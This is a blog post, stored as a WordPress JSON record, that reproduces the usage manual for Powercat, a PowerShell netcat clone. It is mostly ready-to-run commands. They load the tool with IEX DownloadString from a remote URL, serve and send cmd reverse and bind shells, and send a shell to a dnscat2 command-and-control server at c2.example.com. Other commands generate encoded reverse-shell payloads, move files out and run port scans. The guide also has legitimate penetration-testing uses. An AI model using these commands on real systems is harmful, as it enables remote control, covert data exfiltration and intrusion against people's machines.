{"id":2656,"date":"2015-10-27T05:33:02","date_gmt":"2015-10-27T05:33:02","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=2656"},"modified":"2015-10-27T05:33:02","modified_gmt":"2015-10-27T05:33:02","slug":"powercat-the-powershell-version-netcat","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=2656","title":{"rendered":"Powercat &#8211; The Powershell Version [Netcat]"},"content":{"rendered":"<p><strong>Powercat<\/strong> is a powershell function. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts.<\/p>\n<pre class=\"\">Load The Function From Downloaded .ps1 File:\n    . .\\powercat.ps1\nLoad The Function From URL:\n    IEX (New-Object System.Net.Webclient).DownloadString('https:\/\/raw.githubusercontent.com\/besimorhino\/powercat\/master\/powercat.ps1')\n<\/pre>\n<p><strong>Parameters:<\/strong><\/p>\n<pre>-l      Listen for a connection.                             [Switch]\n-c      Connect to a listener.                               [String]\n-p      The port to connect to, or listen on.                [String]\n-e      Execute. (GAPING_SECURITY_HOLE)                      [String]\n-ep     Execute Powershell.                                  [Switch]\n-r      Relay. Format: \"-r tcp:10.1.1.1:443\"                 [String]\n-u      Transfer data over UDP.                              [Switch]\n-dns    Transfer data over dns (dnscat2).                    [String]\n-dnsft  DNS Failure Threshold.                               [int32]\n-t      Timeout option. Default: 60                          [int32]\n-i      Input: Filepath (string), byte array, or string.     [object]\n-o      Console Output Type: \"Host\", \"Bytes\", or \"String\"    [String]\n-of     Output File Path.                                    [String]\n-d      Disconnect after connecting.                         
[Switch]\n-rep    Repeater. Restart after disconnecting.               [Switch]\n-g      Generate Payload.                                    [Switch]\n-ge     Generate Encoded Payload.                            [Switch]\n-h      Print the help message.                              [Switch]\n<\/pre>\n<p><strong>Basic Connections<\/strong><br \/>\nBy default, powercat reads input from the console and writes output to the console using write-host. You can change the output type to &#8216;Bytes&#8217;, or &#8216;String&#8217; with -o.<\/p>\n<pre>Basic Client:\n    powercat -c 10.1.1.1 -p 443\nBasic Listener:\n    powercat -l -p 8000\nBasic Client, Output as Bytes:\n    powercat -c 10.1.1.1 -p 443 -o Bytes\n<\/pre>\n<p><strong>File Transfer<\/strong><br \/>\npowercat can be used to transfer files back and forth using -i (Input) and -of (Output File).<\/p>\n<pre>Send File:\n    powercat -c 10.1.1.1 -p 443 -i C:\\inputfile\nReceive File:\n    powercat -l -p 8000 -of C:\\inputfile\n<\/pre>\n<p><strong>Shells<\/strong><br \/>\npowercat can be used to send and serve shells. Specify an executable to -e, or use -ep to execute powershell.<\/p>\n<pre>Serve a cmd Shell:\n    powercat -l -p 443 -e cmd\nSend a cmd Shell:\n    powercat -c 10.1.1.1 -p 443 -e cmd\nServe a shell which executes powershell commands:\n    powercat -l -p 443 -ep\n<\/pre>\n<p><strong>DNS and UDP<\/strong><br \/>\npowercat supports more than sending data over TCP. Specify -u to enable UDP Mode. 
Data can also be sent to a dnscat2 server with -dns.<\/p>\n<pre>Send Data Over UDP:\n    powercat -c 10.1.1.1 -p 8000 -u\n    powercat -l -p 8000 -u\nConnect to the c2.example.com dnscat2 server using the DNS server on 10.1.1.1:\n    powercat -c 10.1.1.1 -p 53 -dns c2.example.com\nSend a shell to the c2.example.com dnscat2 server using the default DNS server in Windows:\n    powercat -dns c2.example.com -e cmd<\/pre>\n<p><strong>Relays<\/strong><br \/>\nRelays in powercat work just like traditional netcat relays, but you don&#8217;t have to create a file or start a second process. You can also relay data between connections of different protocols.<\/p>\n<pre>TCP Listener to TCP Client Relay:\n    powercat -l -p 8000 -r tcp:10.1.1.16:443\nTCP Listener to UDP Client Relay:\n    powercat -l -p 8000 -r udp:10.1.1.16:53\nTCP Listener to DNS Client Relay\n    powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com\nTCP Listener to DNS Client Relay using the Windows Default DNS Server\n    powercat -l -p 8000 -r dns:::c2.example.com\nTCP Client to Client Relay\n    powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443\nTCP Listener to Listener Relay\n    powercat -l -p 8000 -r tcp:9000\n<\/pre>\n<p><strong>Generate Payloads<\/strong><br \/>\nPayloads which do a specific action can be generated using -g (Generate Payload) and -ge (Generate Encoded Payload). Encoded payloads can be executed with powershell -E. 
You can use these if you don&#8217;t want to use all of powercat.<\/p>\n<pre class=\"\">Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:\n    powercat -c 10.1.1.15 -p 443 -e cmd -g\nGenerate a bind tcp encoded command which listens on port 8000:\n    powercat -l -p 8000 -e cmd -ge\n<\/pre>\n<p><strong>Misc Usage<\/strong><br \/>\npowercat can also be used to perform portscans, and start persistent servers.<\/p>\n<pre>Basic TCP Port Scanner:\n    (21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1 -Verbose -d}\nStart A Persistent Server That Serves a File:\n    powercat -l -p 443 -i C:\\inputfile -rep\n<\/pre>\n<p style=\"text-align: center;\"><a href=\"https:\/\/github.com\/besimorhino\/powercat\" target=\"_blank\" rel=\"noopener noreferrer\">Download Powercat at Github<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Powercat is a powershell function. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts. Load The Function From Downloaded .ps1 File: . 
.\\powercat.ps1 Load The Function From URL: IEX (New-Object System.Net.Webclient).DownloadString(&#8216;https:\/\/raw.githubusercontent.com\/besimorhino\/powercat\/master\/powercat.ps1&#8217;) Parameters:<\/p>\n","protected":false},"author":1,"featured_media":2657,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[63],"tags":[600,102],"class_list":["post-2656","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-windows","tag-netcat","tag-powershell"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2656","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2656"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2656\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2656"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2656"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2656"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}